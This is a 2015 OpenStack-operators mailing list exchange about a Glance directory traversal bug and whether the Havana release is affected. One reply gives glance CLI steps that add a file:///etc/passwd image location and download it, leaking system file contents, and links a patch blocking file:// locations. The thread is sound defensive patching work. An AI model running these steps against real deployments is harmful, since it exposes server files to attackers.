[Openstack-operators] glance directory traversal bug and havana
George Shuklin
george.shuklin at gmail.com
Fri Jan 9 17:10:19 UTC 2015
Seems I was wrong.
Thanks, I'll look at it again.
On 01/08/2015 07:37 PM, Jesse Keating wrote:
> On 1/7/15 8:47 PM, George Shuklin wrote:
>> I spend few hours trying to backport to Havana, but than I found, that
>> Havana seems be immune to the bug. I'm not 100% sure, so someone else
>> advised to look too.
>>
>> The bug was that icehouse+ accepts all supported schemas. Fix excludes
>> 'bad' schemes. Although Havana have explicitly given list of accepted
>> schemes for location field, and 'bad' schemes are not in it.
>>
>
> Havana is certainly not immune. I was able to fetch content from the
> system fairly easily.
>
> Start with an updated glance client
>
> Modify it as listed in
> https://bugs.launchpad.net/glance/+bug/1400966/comments/6
>
> $ glance image-create --disk-format raw --container-format bare
>
> $ glance image-update --size 700 <image_id>
>
> $ glance --os-image-api-version 2 location-add --url file:///etc/passwd
>
> $ glance image-download <image_id>
>
>
> That got me (some of) the contents of /etc/passwd.
>
> The patch I posted prevented this from happening. It blocks adding a
> location that is file:// based, but still allows other location adds
> that should be allowed.
>
> https://github.com/blueboxgroup/glance/commit/7ab98b72802de1d5695d35306e32293463977496
>
>
More information about the OpenStack-operators
mailing list